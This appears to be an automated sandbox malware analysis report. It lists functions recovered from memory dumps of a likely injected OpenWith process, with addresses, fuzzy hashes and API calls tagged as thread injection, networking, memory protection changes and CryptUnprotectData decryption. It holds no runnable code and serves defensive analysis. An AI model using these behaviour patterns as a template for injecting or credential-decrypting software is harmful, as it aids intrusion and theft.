Download Yara Rule

Strings

0, xrefs: 00007DF46E4DC82B

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d4dd2c9ec2e40b847152b417cb6d645fdeafd31ca8a11a7a04321dd5438b40c0
Instruction ID: 9b503857611d58185f82e5fda68cf07d25dd5f1f870f53cbbd544b9141e7f850
Opcode Fuzzy Hash: d4dd2c9ec2e40b847152b417cb6d645fdeafd31ca8a11a7a04321dd5438b40c0
Instruction Fuzzy Hash: 8821A471E0CA8A5FD754DF689884BAB72E1FB88356F51093FF44AC7290D638D8C48745

Function 00007DF46E4DC70C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

0, xrefs: 00007DF46E4DC764

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 47ebd45c6b9b16ee77b28bcb10b07460bf5cba96d3288197dd2caf634787b8b3
Instruction ID: a04745d6e2bb81a45eaca10dc21680df385ed9ae626c2ecb567f79737873a380
Opcode Fuzzy Hash: 47ebd45c6b9b16ee77b28bcb10b07460bf5cba96d3288197dd2caf634787b8b3
Instruction Fuzzy Hash: E121D571B0C98A5FE7509FA884C86AB72F0EB98321F50053FE50EC7250D728D9C48785

Function 00007DF46E4B2634 Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007DF46E4B273A
SuspendThread.KERNELBASE ref: 00007DF46E4B277C

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: CloseHandleSuspendThread
String ID:
API String ID: 1038686644-0
Opcode ID: ee8ed1484b309d5b480d9ed41d064abcb8b4e034361352156597246fbc6f772d
Instruction ID: 44b8a68d5014e9f5f409607ec761f75384be10c9c4e0b1754f7d955124b53171
Opcode Fuzzy Hash: ee8ed1484b309d5b480d9ed41d064abcb8b4e034361352156597246fbc6f772d
Instruction Fuzzy Hash: 4C91C570A0CA564BEB689B28D8955BB73E1FF45310B14427ED05FC7595CE2CE882CB8D

Function 0000011F791B1CD0 Relevance: 3.3, APIs: 2, Instructions: 278
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 0000011F791B1F6E
CloseHandle.KERNELBASE ref: 0000011F791B1F77

Memory Dump Source

Source File: 00000006.00000002.1767089124.0000011F791B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011F791B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11f791b0000_OpenWith.jbxd

Similarity

API ID: AcceptCloseConnectHandlePort
String ID:
API String ID: 3811980168-0
Opcode ID: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
Instruction ID: 895ff40cea4c9149b7d826828385c0cba2e41e61f97bcc181cefc0c2c58d6d19
Opcode Fuzzy Hash: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
Instruction Fuzzy Hash: 8E910830508E088FDB69EF1CD485BE573E2FB84320F15566EE58BC32D6EA74A8578781

Function 0000011F791B0AC8 Relevance: 3.2, APIs: 2, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 0000011F791B0BFD
NtAcceptConnectPort.NTDLL ref: 0000011F791B0C47

Memory Dump Source

Source File: 00000006.00000002.1767089124.0000011F791B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011F791B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11f791b0000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
Instruction ID: 5ab83dec6172703e21c96476f2960d0d5afb13bec947623dadd2f5674ad2dff9
Opcode Fuzzy Hash: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
Instruction Fuzzy Hash: D7417A30A18A140AE32CE62C9896AFDB7E2F7C5319F30557EE1E6C21D6FA79C5438641

Function 0000011F791B1A90 Relevance: 3.2, APIs: 2, Instructions: 150
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 0000011F791B1AD5

Part of subcall function 0000011F791B185C: GetProcessMitigationPolicy.KERNELBASE ref: 0000011F791B192F

NtAcceptConnectPort.NTDLL ref: 0000011F791B1BCF

Memory Dump Source

Source File: 00000006.00000002.1767089124.0000011F791B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011F791B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11f791b0000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$MitigationPolicyProcess
String ID:
API String ID: 2923266908-0
Opcode ID: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
Instruction ID: 19c3b74c59ea9b8d3de8d90880aa198791e4f2c80273cb3a83461fdfc136bf55
Opcode Fuzzy Hash: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
Instruction Fuzzy Hash: 1441F230208B488FDB48DF2C98897D57BD1FB59320F0443AEE95ACB2C7EA74C9168795

Function 00007DF46E504088 Relevance: 3.1, APIs: 2, Instructions: 93networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF46E5041A9), ref: 00007DF46E5040B5

Part of subcall function 00007DF46E503C98: ioctlsocket.WS2_32 ref: 00007DF46E503CC4

bind.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF46E5041A9), ref: 00007DF46E50413A

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: bindioctlsocketsocket
String ID:
API String ID: 3555158474-0
Opcode ID: 1cbeedcb49cdd83f56073e3a9aa9cf65c2d138516cd5c7d59cce1983b39e0131
Instruction ID: fd9c335d12a26932ccc1f5c5e316f0169a2de4fc010eb9b2fd451e4eadb6d53e
Opcode Fuzzy Hash: 1cbeedcb49cdd83f56073e3a9aa9cf65c2d138516cd5c7d59cce1983b39e0131
Instruction Fuzzy Hash: DC21E7707089444FFB58AFB8D89D6A733E1EF65325F10067AE82FC72D5DE289C028655

Function 00007DF46E4DD3C0 Relevance: 3.1, APIs: 2, Instructions: 78nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DD42D
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DD481

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 9166209b5f367574360b80d64ced2ea26e8fa752ef609ccd6263efb912702e76
Instruction ID: 8cec44719ce3514eb7056f4c4315051f91ab8f35b256038689f393023aff8aa0
Opcode Fuzzy Hash: 9166209b5f367574360b80d64ced2ea26e8fa752ef609ccd6263efb912702e76
Instruction Fuzzy Hash: 3721427051CA498FDB55EF18D858BA673F1FBA9341F00452EE44AC36A0DBB5E884CF46

Function 00007DF46E4DD2F4 Relevance: 3.1, APIs: 2, Instructions: 78nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DD361
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DD3B8

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 98531d878e0ad7d3d6690ce9736b63ba0a61470b6d8d195234036ffb9fe9491b
Instruction ID: 7df9d67d6537fa3398fe89baef33bf2bad5421c6148961676f29436bdaef4941
Opcode Fuzzy Hash: 98531d878e0ad7d3d6690ce9736b63ba0a61470b6d8d195234036ffb9fe9491b
Instruction Fuzzy Hash: E321427051CA488FDB49EB68D8447A673F1FBAD341F00452AE44AC36A0DBB4E984CF41

Function 00007DF46E504D8C Relevance: 1.8, APIs: 1, Instructions: 281networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32 ref: 00007DF46E504EF2

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: 653fe3a6da9e8edf6d7f9aad963387fd79a7ca64ce6bed9a03fbf4fad2203229
Instruction ID: b123227a855e43134559729e84af883372abe2c23463a6e24b55cfba61930ea4
Opcode Fuzzy Hash: 653fe3a6da9e8edf6d7f9aad963387fd79a7ca64ce6bed9a03fbf4fad2203229
Instruction Fuzzy Hash: 21A1A1B0A18A854FFBA4DF5884A46EBB3F0FF65314F50012AE45FC6581D738E9528B89

Function 00007DF46E4DC47C Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DC53C

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 1a40425d81a0dda3cd82788b19327da5a379df3b5c3bd351d49e58af76a5eeec
Instruction ID: 7442170e2f034437c0a15e60f21d26dd644fdf8eafe4d1a544ab16eea08d70ec
Opcode Fuzzy Hash: 1a40425d81a0dda3cd82788b19327da5a379df3b5c3bd351d49e58af76a5eeec
Instruction Fuzzy Hash: 8E81B9B0A1CB9A9BE7659B6894546EB73E1FF94300F50463BE44FCB180DB68F8808685

Function 00007DF46E4DC10C Relevance: 1.6, APIs: 1, Instructions: 121nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DC187

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 5c97c20283281d0f686864c64b2abe35391f7ab31688f0fa8af160c1736108da
Instruction ID: 09b5ec28dde5edd38c3eb68c1fc5b03bd0dd516c329e0c41b6f491459befb4e4
Opcode Fuzzy Hash: 5c97c20283281d0f686864c64b2abe35391f7ab31688f0fa8af160c1736108da
Instruction Fuzzy Hash: 11310771B0C95A6FEB185F2898855BF73E1EB89310F20463FE94FC3291DA18FC424A85

Function 00007DF46E4D2258 Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 00007DF46E4D22E1

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: a07a12428c7964199d363ccabf4b149c9f1c56c6408fd6f078d364f4c66a6574
Instruction ID: 8ff80adc9b7312b1c3f7c89109f602c40866fcb6c924e804544ed4cd4ad568e8
Opcode Fuzzy Hash: a07a12428c7964199d363ccabf4b149c9f1c56c6408fd6f078d364f4c66a6574
Instruction Fuzzy Hash: 5131843071CA884FD748DB68D88966BB7E2FBC9701F40452EE48BC3251DE74D8428B46

Function 0000011F791B15AC Relevance: 1.6, APIs: 1, Instructions: 76
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,0000011F791B1E16), ref: 0000011F791B1640

Memory Dump Source

Source File: 00000006.00000002.1767089124.0000011F791B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011F791B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11f791b0000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
Instruction ID: 38c3a17bec567ad860a36ed4b3a8df9f89c55f8f08838f1ed613b8cbc1008f15
Opcode Fuzzy Hash: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
Instruction Fuzzy Hash: F621A271908B088FDB58DF58C4C96AAB7F2FBA9305F054A3EE44AC7260E770D485CB41

Function 00007DF46E4DADD4 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DAE23

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: af3340e2b301fb20eba4bd36f70d30fdbe005acca17dd1e0c445e9428843075b
Instruction ID: f6e5938f180091c4ea86836059d3c9f5f1c25166fda9e33b7af2151bad2fc176
Opcode Fuzzy Hash: af3340e2b301fb20eba4bd36f70d30fdbe005acca17dd1e0c445e9428843075b
Instruction Fuzzy Hash: 6DF0D070A1CB858FDBA4EF2CD4C5B9A77E1FB98304F50451AE44CC3245DB34D8808B46

Function 00007DF46E4DAC0C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DAC70

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: d99824a7b56689602d55d9b975c23b4966fb1dfc1a28fa016acf5b8b83f0fdf8
Instruction ID: 0a596f6c199b980d23d45c8919a1780a82aeea3f3974d463a1fc5e544ea43cc1
Opcode Fuzzy Hash: d99824a7b56689602d55d9b975c23b4966fb1dfc1a28fa016acf5b8b83f0fdf8
Instruction Fuzzy Hash: FBF0627491C7C59FDBA0EB688480B9ABBF0BBAA350F544A1EE8CCC3211D735D5848B43

Function 00007DF46E4DAF60 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,00000000,?,?,00000000,00007DF46E4C341C), ref: 00007DF46E4DAF8A

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 1d9a6f3c19fc3a1664a9a6811ff4ba6c27299ee4e4794d390710366357d59dbc
Instruction ID: f212d3faf48436b4de562207cfe933c9885834a1b0001015f6c9032b1fbdf94e
Opcode Fuzzy Hash: 1d9a6f3c19fc3a1664a9a6811ff4ba6c27299ee4e4794d390710366357d59dbc
Instruction Fuzzy Hash: ACE065716186458FDB04DFA4C8C18AAB3E0FB99304F004E7AE84AC6164D264D598C682

Function 00007DF46E539F04 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?,00007DF46E54B7C7,?,?,?,?,00000000,00000000), ref: 00007DF46E539F21

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d72fac8d1d1b7f96bb5fe0759d88f2d5c6e0343dfc4f10e03c2c9322f33a3d86
Instruction ID: 737f44ebb2d36a7216e06f3402bd3c2b08489e429ea18cad04de1f6eacb20879
Opcode Fuzzy Hash: d72fac8d1d1b7f96bb5fe0759d88f2d5c6e0343dfc4f10e03c2c9322f33a3d86
Instruction Fuzzy Hash: 46E04F319188594BF30EF770DCA58E732B2EBA4304F914632D907820A2ED2C6689C685

Function 00007DF46E4DAE5C Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DAE77

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: eb8f498348e5c7f372421b27a3827434041340d731fc3728b954386bc4ea4cc4
Instruction ID: 27778a561208bbebf8af535f0ddca8279f3871f8314095e19f1f066976e3cab1
Opcode Fuzzy Hash: eb8f498348e5c7f372421b27a3827434041340d731fc3728b954386bc4ea4cc4
Instruction Fuzzy Hash: AED05E20A68A8A4BD650A738894024737E2FFD5304F924615E44EC2200D22CE44192C6

Function 00007DF46E4DACE8 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DAD03

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: a9327488733b823840a3f29582a089392b2a1446868cb63a967a810240f58cb8
Instruction ID: 32d0884f89e0e95e131e6c56e8306abb13746e2eafce3b1bf57949e19e7d7774
Opcode Fuzzy Hash: a9327488733b823840a3f29582a089392b2a1446868cb63a967a810240f58cb8
Instruction Fuzzy Hash: 75D05E30A68A8A4BD610A728980065637E2FFD4304F944615D849C2240D23CE481928E

Function 00007DF46E4DAD14 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DAD2F

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 4927af5c10e17f27f2edd3b7dd4d43612d79bd47543f67f71f12626d98bff908
Instruction ID: d5fd22b3c365fd3504884b6c8cb26af50217f817cd5760ede116dec9cd89762e
Opcode Fuzzy Hash: 4927af5c10e17f27f2edd3b7dd4d43612d79bd47543f67f71f12626d98bff908
Instruction Fuzzy Hash: F3D05E30E68ACA4BDA10A728890024A36E2FF95308F904615D849C2250D23CE4419386

Function 00007DF46E4DAF40 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DAF50

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 953671860da08bf31fab518e05a010f803d920f951da2702e38e3d0cf3acdea6
Instruction ID: 9256bda067b7148905de3ef84c07e57b0adc807d1617d5571155c64219bc123c
Opcode Fuzzy Hash: 953671860da08bf31fab518e05a010f803d920f951da2702e38e3d0cf3acdea6
Instruction Fuzzy Hash: 78C08C80A6980BAAE90867BAAC8439A20E0AF48300F800152E40EC2180E40CE4D4639A

Function 00007DF46E4DACC8 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DACD8

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 333093483b5b65ac6ab85e83ccc52a142bbc301cae1d85d61a22b47e66de8b6c
Instruction ID: f0b1f204326a3f2b6769ae8f37f545fb7a90ec619bf4418344e5f1262faa951d
Opcode Fuzzy Hash: 333093483b5b65ac6ab85e83ccc52a142bbc301cae1d85d61a22b47e66de8b6c
Instruction Fuzzy Hash: 51C08C60A2C80B2BE91463B94C8068620E0AF4C724F820012E80AC21C0E40CE5E0B396

Function 00007DF46E4C65E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF46E4C6640
VirtualProtect.KERNELBASE ref: 00007DF46E4C6669
VirtualProtect.KERNELBASE ref: 00007DF46E4C6685
VirtualProtect.KERNELBASE ref: 00007DF46E4C66B0

Strings

rE\, xrefs: 00007DF46E4C65FE

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual
String ID: rE\
API String ID: 544645111-988334199
Opcode ID: dc7abe3753608a406b2e8c4677f2e3e348cb1d8b9abc271147da51083885c1c3
Instruction ID: e909b3514cff23d89ef083f9628d896adcee88126fc40670a955e40f7bf38656
Opcode Fuzzy Hash: dc7abe3753608a406b2e8c4677f2e3e348cb1d8b9abc271147da51083885c1c3
Instruction Fuzzy Hash: 9121B0717189484BEB44F768E8D1AAB72E6FBD8700F00443AE44FC3286DE68ED4587C2

Function 00007DF46E4C3178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF46E4C31FA
VirtualProtect.KERNELBASE ref: 00007DF46E4C3224

Strings

, xrefs: 00007DF46E4C31DB

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 45ee73fde44b844a7982fd6fa2bb9a274e67d6e904138dbe31d6ae3e461be495
Instruction ID: a574add08845b0e8ab68770047363f98fa52f0f1f7809c25f2c7dcdd3122c581
Opcode Fuzzy Hash: 45ee73fde44b844a7982fd6fa2bb9a274e67d6e904138dbe31d6ae3e461be495
Instruction Fuzzy Hash: B011E7B160889B4BEB15E729E8587F7B3F1EB84710F544276E44FC3191DA1CE891C685

Function 00007DF46E503C98 Relevance: 4.6, APIs: 3, Instructions: 117COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007DF46E503CC4
CreateIoCompletionPort.KERNELBASE ref: 00007DF46E503CFA
SetFileCompletionNotificationModes.KERNEL32 ref: 00007DF46E503D40

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: Completion$CreateFileModesNotificationPortioctlsocket
String ID:
API String ID: 1455841399-0
Opcode ID: b0ef64daf23010be4df91d754ff29401ba7eeb6e21b37df906d22bfb74ec9eab
Instruction ID: 48e998854ca4da141dba24ee74b779eb069f9202537a03b658d4e78cef982708
Opcode Fuzzy Hash: b0ef64daf23010be4df91d754ff29401ba7eeb6e21b37df906d22bfb74ec9eab
Instruction Fuzzy Hash: 2631D67170C9944BFBA89FA8DC99AB733E5FF55354F50007AF80FC6182DA29EC418689

Function 00007DF46E4D6654 Relevance: 4.6, APIs: 3, Instructions: 74COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE ref: 00007DF46E4D669B
CoUninitialize.COMBASE ref: 00007DF46E4D6703
free.MSVCRT ref: 00007DF46E4D6711

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: InitializeUninitializefree
String ID:
API String ID: 1169324116-0
Opcode ID: 300bfe15e1352cda4c3c9a5eb26de8ea91f06f6889c64728d4398b9a5c111e42
Instruction ID: 6fbf0285c29f6789b8b2057879b8c9aec40fa5f44b1c9331514f27a031adb5a6
Opcode Fuzzy Hash: 300bfe15e1352cda4c3c9a5eb26de8ea91f06f6889c64728d4398b9a5c111e42
Instruction Fuzzy Hash: 07214C70609A098FDF84EF38D849AAA77E0FF94315F04462AE84FD3151DB39E941CB94

Function 00007DF46E4C72D0 Relevance: 4.5, APIs: 3, Instructions: 746COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF46E4B4BE4: malloc.MSVCRT ref: 00007DF46E4B4C0D

calloc.MSVCRT ref: 00007DF46E4C7551
free.MSVCRT ref: 00007DF46E4C75BD
free.MSVCRT ref: 00007DF46E4C7AB3

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free$callocmalloc
String ID:
API String ID: 1437353635-0
Opcode ID: 6cebd9367394abf21773eb1584d65681aa51e4210b0eb886ea29ebe4f46530e1
Instruction ID: d7d0ee06531932b389e39fff20b632d8b8f75f6248cc82f7095cb1c242766914
Opcode Fuzzy Hash: 6cebd9367394abf21773eb1584d65681aa51e4210b0eb886ea29ebe4f46530e1
Instruction Fuzzy Hash: E0423D70618E498FEB55EF38D8896EBB7E1FB58700F10462AD04FC7291EB34A585CB85

Function 00007DF46E4B4BE4 Relevance: 3.9, APIs: 3, Instructions: 126COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007DF46E4B4C0D
malloc.MSVCRT ref: 00007DF46E4B4C6C
free.MSVCRT ref: 00007DF46E4B4CD0

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: f833b09acc7dcda6218a08ced81fc052c99920b07a41f041528abf3627ace0e1
Instruction ID: 9db68d9123f7e8e0a22c71c32da3b262036b50b849663c4e0b4ee83014e76623
Opcode Fuzzy Hash: f833b09acc7dcda6218a08ced81fc052c99920b07a41f041528abf3627ace0e1
Instruction Fuzzy Hash: B631A070608A0A9BAB58EF24DC498ABB3F4FF50750B01462AD81BC7591FF64F89687C5

Function 0000011F7ABB33B0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 344memoryCOMMON

Download Yara Rule

